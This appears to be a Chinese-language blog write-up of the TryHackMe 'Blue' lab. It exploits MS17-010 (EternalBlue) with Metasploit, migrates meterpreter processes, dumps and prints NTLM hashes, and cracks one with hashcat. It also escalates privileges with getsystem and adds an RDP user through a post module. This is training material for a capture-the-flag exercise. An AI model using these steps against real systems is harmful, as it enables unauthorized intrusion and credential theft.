0%

TryHackMe-Blue

同样这个靶机也是没什么难度的。。

靶机难度:十分简单

信息收集

1
nmap -sV -sC --script vuln -oN blue.nmap 192.168.56.127

参数详解

-sV 系统服务详细信息
-oN 标准nmap输出
-sC 使用脚本探测

探测之后发现,系统可能可以被ms17_010漏洞影响

漏洞利用

使用metasploit,进行简单的漏洞利用

设置好后靶机IP后,可以直接使用run/exploit运行了

RHOST – 靶机IP
RPORT – 靶机服务端口

获得shell之后,查看当前权限,之后将当前使用shell_to_metasploit升级shell

设置好lhost,lport,session运行。

使用sessions -i 2与会话窗口2交互

使用ps -ef查看进程,然后使用migrate迁移进程,使进程更稳定(不容易被杀掉

1
2
3
meterpreter > migrate 448
[*] Migrating from 1204 to 448...
[*] Migration completed successfully.

有可能会迁移不成功,会有权限不足的提示,尝试另外的进程。

Q:为什么我进程迁移之后退出msf,重新打开就没了?
A:进程迁移只是让你的sesion换个进程,不能改变session的本质,它只是一次会话,迁移进程是为了让它更稳定,不易被断掉,或者利用进程的其他属性,并不能让他变成一个存储在目标硬盘上的永久文件,,如果你想暂时搁置这个sesion,应该使用background命令,暂时后台,并且不要退出msf,.当你需要调出这个session时,使用sessions -l 查看当前所有会话,使用 sessions -i 加上对应会话序号,可以调出session(by 夏姐姐

爆破密码

使用hashdump获得目标机器用户的hash值密码,

1
2
3
4
5
meterpreter > hashdump 
Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
J0n:1001:aad3b435b51404eeaad3b435b51404ee:32ed87bdb5fdc5e9cba88547376818d4:::
Jon:1000:aad3b435b51404eeaad3b435b51404ee:ffb43f0de35be4d9917ac0cc8ad57f8d:::

J0n是我后面提权生成的用户

在Kali中,使用hashcat 破解获取到的haash密码

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
hashcat -a 0 ffb43f0de35be4d9917ac0cc8ad57f8d ../rockyou.txt -o res.txt --force -m 1000


Session..........: hashcat
Status...........: Cracked
Hash.Type........: NTLM
Hash.Target......: ffb43f0de35be4d9917ac0cc8ad57f8d
Time.Started.....: Fri Apr 10 04:34:12 2020 (5 secs)
Time.Estimated...: Fri Apr 10 04:34:17 2020 (0 secs)
Guess.Base.......: File (../rockyou.txt)
Guess.Queue......: 1/1 (100.00%)
Speed.#1.........: 1908.0 kH/s (0.22ms) @ Accel:1024 Loops:1 Thr:1 Vec:8
Recovered........: 1/1 (100.00%) Digests, 1/1 (100.00%) Salts
Progress.........: 10201088/14344385 (71.12%)
Rejected.........: 0/10201088 (0.00%)
Restore.Point....: 10200064/14344385 (71.11%)
Restore.Sub.#1...: Salt:0 Amplifier:0-1 Iteration:0-1
Candidates.#1....: alread852 -> alphasarto11

参数:

-a 爆破模式
-o 输出文件
–force 强制执行
-m NTLM密码 Windows

1
2
cat res.txt 
ffb43f0de35be4d9917ac0cc8ad57f8d:alqfna22

找到flag

1
2
3
4
5
meterpreter > search -f "flag*.txt"
Found 3 results...
c:\flag1.txt (24 bytes)
c:\Users\Jon\Documents\flag3.txt (37 bytes)
c:\Windows\System32\config\flag2.txt (34 bytes)

这里我不知道为什么直接尝试进入c:\Users\Jon\Documents会提示权限不足.所以我就只能尝试提权,使用getsystem提权,或者使用run post/windows/manage/enable_rdp USERNAME=J0n PASSWORD=12345生成远程用户,远程进去也能看。

根据朋友的说法这里可以直接进入cmd中查看该文件,不需要进行提权

不使用msf的情况下利用永恒之蓝

施工中。。本废物暂无思路。
file